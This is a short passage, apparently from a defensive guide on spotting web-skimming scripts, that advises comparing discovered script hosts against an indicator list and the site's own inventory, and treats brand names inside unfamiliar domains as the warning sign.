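Hosts surfaced this way should be compared against the indicator list above and against the site's own inventory of legitimate third-party scripts; a brand name inside an unfamiliar registrable domain (paypal-debit.com, google-assistant.com) is the tell, not the presence of "ga.js".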

 
